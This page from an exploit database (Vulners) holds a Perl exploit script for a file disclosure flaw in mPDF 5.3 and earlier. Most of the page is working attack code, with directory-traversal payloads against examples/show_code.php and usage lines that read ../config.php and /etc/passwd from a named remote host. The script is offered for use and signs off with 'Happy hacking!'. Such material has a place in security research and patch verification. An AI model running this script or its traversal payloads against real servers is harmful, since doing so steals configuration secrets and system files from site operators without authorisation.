Vulners
Lucene search
mPDF 5.3 - File Disclosure
# Exploit Title: mPDF <= 5.3 File Disclosure
# Google Dork: Please no dork
# Date: 16th December 2011
# Author: ZadYree
# Software Link: http://www.mpdf1.com/mpdf/download
# Version: 5.3 and prior
# Tested on: Multiple
# CVE : N/A
#!/usr/bin/perl -U
=head1 TITLE
mPDF <= 5.3 File Disclosure Exploit (0day)
=head2 SYNOPSIS
-- examples/show_code.php --
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die("Invalid file"); }
=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on the
remote server.
=head2 USAGE
perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php
perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd
Requiered modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support
=cut
#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
$del_temp_file = 1;
#******************************************#
use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE => 1;
use constant FALSE => 0;
help() unless (@ARGV >= 2);
my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
help() unless ($absolute || $relatife);
my ($purl, $fpath) = @ARGV;
my $name = $purl;
$name =~ s{http://(.+?)/.*} {$1};
$name .= ("_" . localtime(time) . ".txt");
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);
my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.
say "[*]Retrieving content...";
my $file = make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);
say "[+]OK\012[*]Converting format...";
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;
open(my $fh, '>', $name);
print $fh $text;
close($fh);
say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;
unlink($pdf_file) if ($del_temp_file == TRUE);
sub make_file {
my $content = shift;
open($fh, '>', $pdf_file);
print $fh $content;
close($fh);
return($pdf_file);
}
sub is_pdf {
my $checked_file = shift;
my $ft = File::Type->new();
return(1) if ($ft->mime_type($checked_file) eq "application/pdf");
return(0);
}
help() if ($help);
sub help {
say <<"EOF";
Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read>
Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
exit(0);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2011 00:00Current
7High risk
Vulners AI Score7